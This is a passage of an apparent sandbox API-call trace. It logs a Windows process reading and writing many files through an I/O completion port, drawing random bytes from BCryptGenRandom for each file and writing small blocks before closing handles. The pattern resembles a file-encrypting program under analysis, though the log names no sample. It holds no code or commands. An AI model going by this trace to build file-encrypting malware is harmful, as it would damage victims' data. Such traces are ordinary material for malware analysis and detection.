lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.404] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3700, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.414] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2440, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.432] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0154.432] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.459] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.460] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.469] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2ec0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0154.469] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.478] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x23f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0154.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0154.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0154.490] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.490] free (_Block=0x3e305b8) [0154.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.490] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.490] free (_Block=0x1fa91d0) [0154.490] free (_Block=0x1fa2ed8) [0154.491] free (_Block=0x1fa90b8) [0154.491] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.496] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0154.507] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.509] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x21a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0154.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.552] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7898, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.567] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x931a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.597] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xc6d2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0154.613] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.626] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa80c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.639] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0154.653] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0154.654] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0154.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0154.654] free (_Block=0x3e305b8) [0154.654] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0154.654] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0154.654] free (_Block=0x1fa91d0) [0154.655] free (_Block=0x1fa2ed8) [0154.655] free (_Block=0x1fa90b8) [0154.655] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0154.655] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.668] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xd6c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0154.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0154.672] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x42d1, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0154.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.225] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x43c5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0155.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.239] CloseHandle (hObject=0x308) returned 1 [0155.239] free (_Block=0x3e70008) [0155.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.252] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.252] free (_Block=0x3e305b8) [0155.252] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.252] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.252] free (_Block=0x1fa91d0) [0155.252] free (_Block=0x1fa2ed8) [0155.252] free (_Block=0x1fa90b8) [0155.253] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.254] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x8d90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.299] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0155.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.336] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.336] free (_Block=0x3e305b8) [0155.336] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.337] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.337] free (_Block=0x1fa91d0) [0155.337] free (_Block=0x1fa2ed8) [0155.337] free (_Block=0x1fa90b8) [0155.337] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.346] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.346] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.346] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.346] free (_Block=0x3e305b8) [0155.346] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.346] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.346] free (_Block=0x1fa91d0) [0155.346] free (_Block=0x1fa2ed8) [0155.347] free (_Block=0x1fa90b8) [0155.347] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.347] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.354] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.354] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.354] free (_Block=0x3e305b8) [0155.354] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.354] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.354] free (_Block=0x1fa91d0) [0155.354] free (_Block=0x1fa2ed8) [0155.354] free (_Block=0x1fa90b8) [0155.354] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.354] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.355] CloseHandle (hObject=0x308) returned 1 [0155.355] free (_Block=0x1ff1e60) [0155.355] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.356] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.356] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.357] CloseHandle (hObject=0x170) returned 1 [0155.357] free (_Block=0x3df0008) [0155.357] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.377] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.378] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.378] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.378] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.378] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.379] free (_Block=0x3e305b8) [0155.379] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.379] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.379] free (_Block=0x1fa91d0) [0155.379] free (_Block=0x1fa2ed8) [0155.379] free (_Block=0x1fa90b8) [0155.379] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0155.379] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.397] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.397] free (_Block=0x3e305b8) [0155.397] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.397] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.397] free (_Block=0x1fa91d0) [0155.397] free (_Block=0x1fa2ed8) [0155.397] free (_Block=0x1fa90b8) [0155.398] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0155.398] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.398] CloseHandle (hObject=0x170) returned 1 [0155.398] free (_Block=0x3df0008) [0155.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0155.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0155.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0155.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0155.400] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0155.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0155.400] free (_Block=0x3e305b8) [0155.400] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0155.400] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0155.400] free (_Block=0x1fa91d0) [0155.400] free (_Block=0x1fa2ed8) [0155.400] free (_Block=0x1fa90b8) [0155.400] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0155.407] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x12b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0155.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, 